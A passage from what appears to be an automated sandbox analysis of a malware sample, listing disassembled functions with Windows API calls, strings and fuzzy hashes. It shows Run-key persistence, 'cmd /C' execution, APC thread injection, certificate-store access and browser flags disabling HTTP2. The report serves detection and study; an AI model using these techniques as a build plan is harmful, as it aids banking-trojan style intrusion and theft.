Part of subcall function 00B2E55A: RegCloseKey.ADVAPI32(?,?,?,00B34D11,00000000,00000000,00000000,00000000), ref: 00B2E5E1

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 00B2FB13
lstrcpyW.KERNEL32(-00000002,?), ref: 00B2FB74
lstrcatW.KERNEL32(00000000,.exe), ref: 00B2FB82
lstrcpyW.KERNEL32(?), ref: 00B2FB9C
lstrcatW.KERNEL32(00000000,.dll), ref: 00B2FBA4

Part of subcall function 00B2447F: lstrlenW.KERNEL32(?,.dll,?,00000000,00B1A218,?,.dll,?,00001000,?,?,?), ref: 00B2448D
Part of subcall function 00B2447F: lstrlen.KERNEL32(DllRegisterServer), ref: 00B2449B
Part of subcall function 00B2447F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 00B244B0

RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 00B2FC02

Part of subcall function 00B27854: lstrlenW.KERNEL32(004F0053,System,00000000,00000000,?,?,00B1F7B7,004F0053,00000000), ref: 00B27860
Part of subcall function 00B27854: memcpy.NTDLL(00000000,004F0053,00000000,00000002,?,?,00B1F7B7,004F0053,00000000), ref: 00B27888
Part of subcall function 00B27854: memset.NTDLL ref: 00B2789A

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?), ref: 00B2FC37
GetLastError.KERNEL32 ref: 00B2FC42
HeapFree.KERNEL32(00000000,00000000), ref: 00B2FC58
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 00B2FC6A

Strings

.exe, xrefs: 00B2FB7C
.dll, xrefs: 00B2FB9E
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00B2FACD

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
String ID: .dll$.exe$Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 1430934453-2351516416
Opcode ID: 4472c23b12bef8160244ef08673b23758dee76173cd115704e87aa3adf3f7639
Instruction ID: 653c9d86e5fda2e371b84632859003c01069613a87a29df6c7cc2fdbaabf07e6
Opcode Fuzzy Hash: 4472c23b12bef8160244ef08673b23758dee76173cd115704e87aa3adf3f7639
Instruction Fuzzy Hash: CC415E7190022AABDB11ABA5ED45EAE7BF9FF04304B2005B5F918A7160EB31DA15DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B1B598, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 121processstringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B1B5AD

Part of subcall function 00B3134B: lstrlen.KERNEL32(?,00000008,00000000,?,73B75520,00B21372,?,?,00000000,00B11589,?,00000000,?,00B25B4A,?,00000001), ref: 00B3135A
Part of subcall function 00B3134B: mbstowcs.NTDLL ref: 00B31376

lstrlenW.KERNEL32(00000000,00000000,00000000,7711DBB0,00000000,cmd /C "%s> %s1"), ref: 00B1B5E6
wcstombs.NTDLL ref: 00B1B5F0
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7711DBB0,00000000,cmd /C "%s> %s1"), ref: 00B1B621
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B2793E), ref: 00B1B64D
TerminateProcess.KERNEL32(?,000003E5), ref: 00B1B663
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B2793E), ref: 00B1B677
GetLastError.KERNEL32 ref: 00B1B67B
GetExitCodeProcess.KERNEL32(?,00000001), ref: 00B1B69B
CloseHandle.KERNEL32(?), ref: 00B1B6AA
CloseHandle.KERNEL32(?), ref: 00B1B6AF
GetLastError.KERNEL32 ref: 00B1B6B3

Strings

cmd /C "%s> %s1", xrefs: 00B1B59E
D, xrefs: 00B1B5C1

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
String ID: D$cmd /C "%s> %s1"
API String ID: 2463014471-2226621151
Opcode ID: 3183867473627029501a197678d53126724de95a5d6db198295bd6ec4c748e45
Instruction ID: a005b526ea44c192f73e830899c8326f29d97755da51f831a94adf011f667773
Opcode Fuzzy Hash: 3183867473627029501a197678d53126724de95a5d6db198295bd6ec4c748e45
Instruction Fuzzy Hash: 434105B1900218EFDB11AFA4DD85DEEBBB9EB18344F2040AAF505B3150DB719E859B61

Uniqueness

Uniqueness Score: -1.00%

Function 00B11460, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 188memorystringthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2798A: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00B279CF
Part of subcall function 00B2798A: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00B279E7
Part of subcall function 00B2798A: WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,00B11489,00B25B4A,?,00000001), ref: 00B27AAD
Part of subcall function 00B2798A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,00B11489,00B25B4A,?,00000001), ref: 00B27AD6
Part of subcall function 00B2798A: HeapFree.KERNEL32(00000000,00B11489,?,00000000,?,?,?,?,?,00B11489,00B25B4A,?,00000001), ref: 00B27AE6
Part of subcall function 00B2798A: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,00B11489,00B25B4A,?,00000001), ref: 00B27AEF

lstrcmp.KERNEL32(?,?), ref: 00B114D7
HeapFree.KERNEL32(00000000,?), ref: 00B11503
GetCurrentThreadId.KERNEL32 ref: 00B115A9
GetCurrentThread.KERNEL32 ref: 00B115BA
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00B25B4A,?,00000001), ref: 00B115F7
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00B25B4A,?,00000001), ref: 00B1160B
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00B11619
wsprintfA.USER32 ref: 00B1162A
lstrlen.KERNEL32(00000000,00000000), ref: 00B11635

Part of subcall function 00B2ECB1: lstrlen.KERNEL32(?,00000000,00B36C86,73B75520,00B14BBD,?,?,?,00B115E5,?,?,00000000,?,00B25B4A,?,00000001), ref: 00B2ECBB
Part of subcall function 00B2ECB1: lstrcpy.KERNEL32(00000000,?), ref: 00B2ECDF
Part of subcall function 00B2ECB1: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,00B115E5,?,?,00000000,?,00B25B4A,?,00000001), ref: 00B2ECE6
Part of subcall function 00B2ECB1: lstrcat.KERNEL32(00000000,00000001), ref: 00B2ED3D

HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 00B1164F
HeapFree.KERNEL32(00000000,00000000), ref: 00B11660
HeapFree.KERNEL32(00000000,?), ref: 00B1166C

Strings

DLL load status: %u, xrefs: 00B11624

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
String ID: DLL load status: %u
API String ID: 773763258-2598350583
Opcode ID: 1d245cf1df3bcd545b0d534d66b9e59a42f49afb2def60693407636faf8f8af3
Instruction ID: 445f6c86a13e9c8516afe5fab73f40d13f8b37ae3985594bf4dedc8200b9e765
Opcode Fuzzy Hash: 1d245cf1df3bcd545b0d534d66b9e59a42f49afb2def60693407636faf8f8af3
Instruction Fuzzy Hash: 27711571900219EFCB11DFA9EC85AEEBBF6FF08350F5444A5E605A7260DB309A85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B27F3D, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

memset.NTDLL ref: 00B27F6B
StrChrA.SHLWAPI(?,0000000D), ref: 00B27FB1
StrChrA.SHLWAPI(?,0000000A), ref: 00B27FBE
StrChrA.SHLWAPI(?,0000007C), ref: 00B27FE5
StrTrimA.SHLWAPI(?,00B3A48C), ref: 00B27FFA
StrChrA.SHLWAPI(?,0000003D), ref: 00B28003
StrTrimA.SHLWAPI(00000001,00B3A48C), ref: 00B28019
_strupr.NTDLL ref: 00B28020
StrTrimA.SHLWAPI(?,?), ref: 00B2802D
memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 00B28075
lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,00B383E4,00000002,?,?), ref: 00B28094

Strings

;, xrefs: 00B27FD3
, xrefs: 00B28025

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
String ID: $;
API String ID: 4019332941-73438061
Opcode ID: 5dcae2c71eff80b274d281fb6792d7a011ea9971cfdd612ef300a7c94078a505
Instruction ID: 0379a96d51f150f9637916c818324697919bc915b02c940bbf9c7ac8147c817f
Opcode Fuzzy Hash: 5dcae2c71eff80b274d281fb6792d7a011ea9971cfdd612ef300a7c94078a505
Instruction Fuzzy Hash: 8041E0715083159FD720DF28AC45B2BBBE8EF48300F14099AF999D7252DF74D909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B2AE20, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 134stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,73B75520,?,00000000,?,?,?), ref: 00B2AE39
lstrlen.KERNEL32(?), ref: 00B2AE3F
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B2AE4F
lstrcpy.KERNEL32(00000000,?), ref: 00B2AE69
lstrlen.KERNEL32(?), ref: 00B2AE81
lstrlen.KERNEL32(?), ref: 00B2AE8F
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 00B2AEDD
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 00B2AF01
lstrlen.KERNEL32(?), ref: 00B2AF2F
HeapFree.KERNEL32(00000000,?,?), ref: 00B2AF5A
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 00B2AF71
HeapFree.KERNEL32(00000000,?,?), ref: 00B2AF7E

Strings

http, xrefs: 00B2AF08, 00B2AF18

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$Free$Allocatelstrcpy
String ID: http
API String ID: 904523553-2541227442
Opcode ID: 40a7c82f95bb56ef4ecb449bf28f720d4cd74d2b32a4de7dde810a3698b749ba
Instruction ID: a8a5959c4dfe462ad81d486fcf1b79ba171dac6f0e3758d554a3b842149e7db2
Opcode Fuzzy Hash: 40a7c82f95bb56ef4ecb449bf28f720d4cd74d2b32a4de7dde810a3698b749ba
Instruction Fuzzy Hash: 1B416AB1900219BFDF119FA4EC80AAE7BE9FB08300F2084A5F91997160DB759E51CF21

Uniqueness

Uniqueness Score: -1.00%

Function 00B2AD28, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 89memoryregistrystringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 00B2AD39
GetTempPathA.KERNEL32(00000000,00000000,?,?,00B30C92,00000094,00000000,00000000), ref: 00B2AD51
RtlAllocateHeap.NTDLL(00000000,00000011), ref: 00B2AD60
GetTempPathA.KERNEL32(00000001,00000000,?,?,00B30C92,00000094,00000000,00000000), ref: 00B2AD73
GetTickCount.KERNEL32 ref: 00B2AD77
wsprintfA.USER32 ref: 00B2AD87
RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 00B2ADBB
StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 00B2ADD3
lstrlen.KERNEL32(00000000), ref: 00B2ADDD
RegCloseKey.ADVAPI32(?), ref: 00B2ADF9
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00B2AE07

Strings

%lu.exe, xrefs: 00B2AD81
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00B2ADB1

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
String ID: %lu.exe$Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 1404517112-2576086316
Opcode ID: de11f36307dae2aa89ab22e7be65822b0a51bf0dce55fbd31797fe7b03aeced1
Instruction ID: 50bcafda5c8d5e37ad4313fb41b81d797f4a1834cc58818eecf42a0758a8706a
Opcode Fuzzy Hash: de11f36307dae2aa89ab22e7be65822b0a51bf0dce55fbd31797fe7b03aeced1
Instruction Fuzzy Hash: C4215571401228FFDB11AFA0EC88DAF7FADEF45391B204065F909D3120EE708E55CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B14393, Relevance: 21.2, APIs: 14, Instructions: 205memorystringthreadCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,00B1B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?), ref: 00B143E2
StrTrimA.SHLWAPI(00000001,20000920,?,00000000,00B1B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?,00000001), ref: 00B143FB
StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,00B1B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?), ref: 00B14406
StrTrimA.SHLWAPI(00000001,20000920,?,00000000,00B1B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?,00000001), ref: 00B1441F
lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,00B1B033,?,00000000,0000010F,00000001,00000057,?,?), ref: 00B144C8
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00B144EA
lstrcpy.KERNEL32(00000020,?), ref: 00B14509
lstrlen.KERNEL32(?,?,00000000,00B1B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?,00000001,00000000), ref: 00B14513
memcpy.NTDLL(?,?,?,?,00000000,00B1B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?), ref: 00B14554
memcpy.NTDLL(?,?,?,?,?,00000000,00B1B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?), ref: 00B14567
SwitchToThread.KERNEL32(00000057,00000000,?,0000010F,?,?,?,?,?,00000000,00B1B033,?,00000000,0000010F,00000001,00000057), ref: 00B1458B
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000010F,?,?,?,?,?,00000000,00B1B033,?,00000000,0000010F), ref: 00B145AA
HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,00B1B033,?,00000000,0000010F,00000001,00000057,?), ref: 00B145D0
HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,00B1B033,?,00000000,0000010F,00000001,00000057,?), ref: 00B145EC

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
String ID:
API String ID: 3323474148-0
Opcode ID: f7749459a681f5e94116f0c6e629e8d38928db971e174c0ee8650e4361c2e8b2
Instruction ID: 04a1755c4edda5d41a8db326f9614c87b138c36bc414d22ffe42e5681021a5de
Opcode Fuzzy Hash: f7749459a681f5e94116f0c6e629e8d38928db971e174c0ee8650e4361c2e8b2
Instruction Fuzzy Hash: 54715A72504301AFD721DF24DC85B9BBBE9FB48304F14496EF59993260DB70EA89CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B15068, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memorystringCOMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI(?), ref: 00B15082
PathFindFileNameW.SHLWAPI(?), ref: 00B15098
lstrlenW.KERNEL32(00000000), ref: 00B150DB
RtlAllocateHeap.NTDLL(00000000,00B369FC), ref: 00B150F1
memcpy.NTDLL(00000000,00000000,00B369FA), ref: 00B15104
_wcsupr.NTDLL ref: 00B1510F
lstrlenW.KERNEL32(?,00B369FA), ref: 00B15148
RtlAllocateHeap.NTDLL(00000000,?,00B369FA), ref: 00B1515D
lstrcpyW.KERNEL32(00000000,?), ref: 00B15173
lstrcatW.KERNEL32(00000000, --use-spdy=off --disable-http2), ref: 00B15191
HeapFree.KERNEL32(00000000,00000000), ref: 00B151A0

Strings

--use-spdy=off --disable-http2, xrefs: 00B1518B

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
String ID: --use-spdy=off --disable-http2
API String ID: 3868788785-3215622688
Opcode ID: 2b14ae47e01fb98572719d238399ca75f4bde00e5efa0f22057f305b94944512
Instruction ID: 1d387dac8a2b4e7b821e44d622c9e530c8a652ee3a72ad9e4e6d1d5858789294
Opcode Fuzzy Hash: 2b14ae47e01fb98572719d238399ca75f4bde00e5efa0f22057f305b94944512
Instruction Fuzzy Hash: EE31E536500B54FBC2315FB4AC88AAF7BE9EBC9320F640669F551E31A1DF719C818B91

Uniqueness

Uniqueness Score: -1.00%

Function 00B2BDEF, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 114memorythreadstringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 00B2BE13
GetCurrentThreadId.KERNEL32 ref: 00B2BE29
GetCurrentThread.KERNEL32 ref: 00B2BE3A

Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28812
Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B2882B
Part of subcall function 00B28800: GetCurrentThreadId.KERNEL32 ref: 00B28838
Part of subcall function 00B28800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28844
Part of subcall function 00B28800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28852
Part of subcall function 00B28800: lstrcpy.KERNEL32(00000000), ref: 00B28874

Part of subcall function 00B181A5: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,00B2BE81,00000020,00000000,?,00000000), ref: 00B18210
Part of subcall function 00B181A5: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,00B2BE81,00000020,00000000,?,00000000), ref: 00B18238

HeapFree.KERNEL32(00000000,?,00000020,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 00B2BEAF
HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 00B2BEBF
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00B2BF0B
wsprintfA.USER32 ref: 00B2BF1C
lstrlen.KERNEL32(00000000,00000000), ref: 00B2BF27
HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 00B2BF41

Strings

W, xrefs: 00B2BEF8
PluginRegisterCallbacks, xrefs: 00B2BECB
DLL load status: %u, xrefs: 00B2BF16

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
String ID: DLL load status: %u$PluginRegisterCallbacks$W
API String ID: 630447368-2893651616
Opcode ID: 3a9468d3e258fd67c17877613ca488d2dc4f78655a8d46330b7059498b6851d0
Instruction ID: 8b17676541eac0f2b98de421c594fab141cddfee920a60fc0b0f512dd61bef26
Opcode Fuzzy Hash: 3a9468d3e258fd67c17877613ca488d2dc4f78655a8d46330b7059498b6851d0
Instruction Fuzzy Hash: D2413831901229BBCB11AFA5EC88DEE7FB9FF44750B204495FA0992161DF308A95DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B24C88, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 78memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 00B24C9F
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,00B30E25,00000094,00000000,00000001,00000094,00000000,00000000,00B145A1,00000000,00000094,00000000), ref: 00B24CB1
StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,00B30E25,00000094,00000000,00000001,00000094,00000000,00000000,00B145A1,00000000,00000094,00000000), ref: 00B24CBE
wsprintfA.USER32 ref: 00B24CD2
CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000,00B145A1,00000000,00000094,00000000), ref: 00B24CE8
GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 00B24D01
WriteFile.KERNEL32(00000000,00000000), ref: 00B24D09
GetLastError.KERNEL32 ref: 00B24D17
CloseHandle.KERNEL32(00000000), ref: 00B24D20
GetLastError.KERNEL32(?,00000000,?,00B30E25,00000094,00000000,00000001,00000094,00000000,00000000,00B145A1,00000000,00000094,00000000), ref: 00B24D31
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00B30E25,00000094,00000000,00000001,00000094,00000000,00000000,00B145A1,00000000,00000094,00000000), ref: 00B24D41

Strings

\\.\%s, xrefs: 00B24CCC

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
String ID: \\.\%s
API String ID: 3873609385-869905501
Opcode ID: 425ed8f2def6ffa4e8d9879e8cad446bcec50dacdfd00b83015ab3c7097fa841
Instruction ID: a9e12b829e902f2e74e2516b2bfd390ad427be6507dc6fe93bb69a66b5200f91
Opcode Fuzzy Hash: 425ed8f2def6ffa4e8d9879e8cad446bcec50dacdfd00b83015ab3c7097fa841
Instruction Fuzzy Hash: 1A11B1711407287FD2212B64BC8CF7F3A9CEB427A5F2004B4FA0A931A0DF600D498A72

Uniqueness

Uniqueness Score: -1.00%

Function 00B323B3, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 65filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28812
Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B2882B
Part of subcall function 00B28800: GetCurrentThreadId.KERNEL32 ref: 00B28838
Part of subcall function 00B28800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28844
Part of subcall function 00B28800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28852
Part of subcall function 00B28800: lstrcpy.KERNEL32(00000000), ref: 00B28874

DeleteFileA.KERNEL32(00000000,000004D2), ref: 00B323D6
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00B323DF
GetLastError.KERNEL32 ref: 00B323E9
HeapFree.KERNEL32(00000000,00000000), ref: 00B3246D

Strings

TrustedPeople, xrefs: 00B32436
Disallowed, xrefs: 00B32420
AddressBook, xrefs: 00B323FF
AuthRoot, xrefs: 00B3240A
Root, xrefs: 00B3242B
CertificateAuthority, xrefs: 00B32415
TrustedPublisher, xrefs: 00B32441

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
String ID: AddressBook$AuthRoot$CertificateAuthority$Disallowed$Root$TrustedPeople$TrustedPublisher
API String ID: 3543646443-3095660563
Opcode ID: 6501b350b015ab2627b9d05dbda38bb91dbf1afbe54d5f1f6c12b28b17d2a3fa
Instruction ID: 801dd8ce7954a9b1534d05055363c2d5da88db04beaad7ad7d1ec300d179b123
Opcode Fuzzy Hash: 6501b350b015ab2627b9d05dbda38bb91dbf1afbe54d5f1f6c12b28b17d2a3fa
Instruction Fuzzy Hash: DB016537A95628B2C53033B1BC0BFCF2DC8DF967A1F500091B608622918DB4464491F6

Uniqueness

Uniqueness Score: -1.00%

Function 00B1A7B1, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 65threadprocesslibraryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,73BCF5B0,00B27D3D,61636F4C,00000001,?,?), ref: 00B1A7D7
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00B1A7E3
GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess,?,00000000,00000000), ref: 00B1A7FA
GetProcAddress.KERNEL32(00000000), ref: 00B1A801
Thread32First.KERNEL32(?,0000001C), ref: 00B1A811
OpenThread.KERNEL32(001F03FF,00000000,00B27D3D), ref: 00B1A82C
QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 00B1A83D
CloseHandle.KERNEL32(00000000), ref: 00B1A844
Thread32Next.KERNEL32(?,0000001C), ref: 00B1A84D
CloseHandle.KERNEL32(?), ref: 00B1A859

Strings

KERNEL32.DLL, xrefs: 00B1A7F5
ExitProcess, xrefs: 00B1A7F0

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID: ExitProcess$KERNEL32.DLL
API String ID: 2341152533-108369947
Opcode ID: 0a0077bc7850c5e84e002d5a364334c5b225ba1e692fa69e5f59455fcb85b910
Instruction ID: b7b2a735153a1bf9093fc700aebe005cfc84f9c28151a86cd19b0d8b9ef30fc0
Opcode Fuzzy Hash: 0a0077bc7850c5e84e002d5a364334c5b225ba1e692fa69e5f59455fcb85b910
Instruction Fuzzy Hash: 52115171900218FFDF116FA4DC85DEE7BB9EF08355F104075FA11A61A0DB709D869BA2

Uniqueness

Uniqueness Score: -1.00%

Function 001F3C32, Relevance: 19.7, APIs: 13, Instructions: 223memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 001F3C50
GetTickCount.KERNEL32 ref: 001F3C64
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001F3DBA
GetTickCount.KERNEL32 ref: 001F3DCA
RtlEnterCriticalSection.NTDLL(001FD294), ref: 001F3DDE
RtlLeaveCriticalSection.NTDLL(001FD294), ref: 001F3DFC

Part of subcall function 001F49EC: lstrcat.KERNEL32(00000000,00000000), ref: 001F4A41
Part of subcall function 001F49EC: StrTrimA.SHLWAPI(00000000,001FC2C0,00000000,00000000,001F3E0F,?,00000000,001F3E0F,00000000,001FD2D4), ref: 001F4A5E

StrTrimA.SHLWAPI(00000000,001FC2C4,00000000,001FD2D4), ref: 001F3E2E

Part of subcall function 001F9FA4: lstrcpy.KERNEL32(00000000,?), ref: 001F9FCF
Part of subcall function 001F9FA4: lstrcat.KERNEL32(00000000,?), ref: 001F9FDA

lstrcpy.KERNEL32(00000000,?), ref: 001F3E58
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 001F3E9A
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 001F3EA9
HeapFree.KERNEL32(00000000,00000000,00000000,001FD2D4), ref: 001F3EB9
HeapFree.KERNEL32(00000000,?), ref: 001F3ECA
HeapFree.KERNEL32(00000000,00000000), ref: 001F3ED8

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: Heap$Free$AllocateCountCriticalSectionTickTrimlstrcatlstrcpy$EnterLeave
String ID:
API String ID: 2261989257-0
Opcode ID: e2ce48eb65a6fdaf2a8c5771b710f577bc71822d75f04e9d8adcb29c0fc7e9cc
Instruction ID: 1c4adbd327c8fb859cc079eb4f1f5444dbdd5b860d025f414d87f62ab0feb9b8
Opcode Fuzzy Hash: e2ce48eb65a6fdaf2a8c5771b710f577bc71822d75f04e9d8adcb29c0fc7e9cc
Instruction Fuzzy Hash: 03719D72500209EFC721DBA8ED88E7777EEFB88314B150415F959C3621EB35E946EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B20758, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2B8FB: RtlEnterCriticalSection.NTDLL(00B3E268), ref: 00B2B903
